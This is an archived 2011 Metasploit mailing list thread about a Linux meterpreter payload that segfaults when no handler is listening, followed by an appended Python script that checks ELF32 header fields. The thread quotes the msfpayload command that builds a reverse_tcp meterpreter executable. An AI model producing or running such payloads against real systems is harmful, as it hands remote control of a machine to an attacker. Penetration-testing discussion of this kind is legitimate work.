Metasploit mailing list archives

Re: Is Linux meterpreter broken?
From: egypt () metasploit com
Date: Thu, 9 Jun 2011 12:52:56 -0600

Yup, Rob has it right here.  If session initiation fails (e.g. because
the handler isn't set up or there is a network issue preventing it
from getting the second stage), the payload will run off the end of
the .text section, causing a segfault.  The "corrupted header size" is
an artifact of how we build the ELF and can be safely ignored.  At
some point we'll probably revamp it a bit so it looks a little more
like a regular ELF.

Hope this helped,

On Thu, Jun 9, 2011 at 8:07 AM, Rob Fuller <mubix () room362 com> wrote:
Someone will correct me if I'm wrong, but I believe all Linux-based
payloads will segfault if they cannot create a connection to the
handler, so set up a multi/handler and see if it still segfaults.

Rob Fuller | Mubix
Certified Checkbox Unchecker
Room362.com | Hak5.org

On Thu, Jun 9, 2011 at 7:23 AM, Crypto Cracker <cryptocracker () gmail com> wrote:
Backtrack 5 (x86, KDE) on VirtualBox 4.0.8 r71778:
root@bt:/pentest/exploits/framework3# apt-get update
Hit http://32.repository.backtrack-linux.org revolution Release.gpg
Reading package lists... Done
root@bt:/pentest/exploits/framework3# apt-get upgrade
Reading package lists... Done
0 upgraded, 0 newly installed, 0 to remove and 4 not upgraded.
root@bt:/pentest/exploits/framework3# uname -a
Linux bt 2.6.38 #1 SMP Thu Mar 17 20:52:18 EDT 2011 i686 GNU/Linux
root@bt:/pentest/exploits/framework3# svn up
At revision 12886.

[so everything up to date]

root@bt:/pentest/exploits/framework3# ./msfpayload
linux/x86/meterpreter/reverse_tcp LHOST= LPORT=80 X >
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/meterpreter/reverse_tcp
 Length: 50
Options: {"LHOST"=>"", "LPORT"=>"80"}
root@bt:/pentest/exploits/framework3# file linux.meterpreter
linux.meterpreter: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV),
statically linked, corrupted section header size
root@bt:/pentest/exploits/framework3#
[doh! corrupted section header size!! and of course:]
root@bt:/pentest/exploits/framework3# chmod +x linux.meterpreter
root@bt:/pentest/exploits/framework3# ./linux.meterpreter
Segmentation fault
root@bt:/pentest/exploits/framework3#

or am I doing something wrong?

Thanks a lot,
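
Added example, not part of the original thread and not Metasploit's code: a triage check that separates the section-header fields of an ELF32 header, which only tools such as file read, from the program-header fields the loader depends on. It assumes the "corrupted section header size" message comes from e_shentsize not matching the 40-byte Elf32_Shdr; audit_elf32 and build_sample are hypothetical names, and the sample images are constructed here rather than taken from the framework's template.

```python
import struct

# ELF32 little-endian file header (52 bytes); field order follows the ELF spec.
EHDR = struct.Struct("<16sHHIIIIIHHHHHH")
SHDR_SIZE = 40  # sizeof(Elf32_Shdr)
PHDR_SIZE = 32  # sizeof(Elf32_Phdr)

def audit_elf32(data):
    """Return findings about the header tables of a 32-bit LSB ELF image."""
    if len(data) < EHDR.size or data[:4] != b"\x7fELF":
        return ["not an ELF32 image"]
    if data[4] != 1 or data[5] != 1:
        return ["not 32-bit little-endian; checks below do not apply"]
    (_, _, _, _, _, phoff, shoff, _, _,
     phentsize, phnum, shentsize, shnum, _) = EHDR.unpack_from(data)
    findings = []
    # Section headers serve linkers and analysis tools, not the loader.
    if shentsize != SHDR_SIZE:
        findings.append(f"e_shentsize={shentsize}, expected {SHDR_SIZE}")
    if shnum == 0:
        findings.append("no section header table")
    elif shoff + shnum * shentsize > len(data):
        findings.append("section header table runs past end of file")
    # Program headers are what the kernel maps, so these matter at run time.
    if phnum == 0:
        findings.append("no program headers")
    elif phentsize != PHDR_SIZE:
        findings.append(f"e_phentsize={phentsize}, expected {PHDR_SIZE}")
    elif phoff + phnum * phentsize > len(data):
        findings.append("program header table runs past end of file")
    return findings

def build_sample(shentsize, shnum):
    """Constructed sample: header, one zeroed program header, optional section table."""
    ident = b"\x7fELF" + bytes([1, 1, 1]) + bytes(9)
    shoff = EHDR.size + PHDR_SIZE if shnum else 0
    header = EHDR.pack(ident, 2, 3, 1, 0x08048054, EHDR.size, shoff, 0,
                       EHDR.size, PHDR_SIZE, 1, shentsize, shnum, 0)
    return header + bytes(PHDR_SIZE) + bytes(shentsize * shnum)

if __name__ == "__main__":
    # Assumption: a header-only stub leaves the section fields zeroed.
    for label, image in [("stub-like", build_sample(0, 0)),
                         ("regular", build_sample(SHDR_SIZE, 2))]:
        print(label, audit_elf32(image) or "header tables consistent")
```

Findings limited to the section-header fields describe how the file was built, not whether it can load, so they work as a triage signal for hand-assembled binaries rather than as proof of damage.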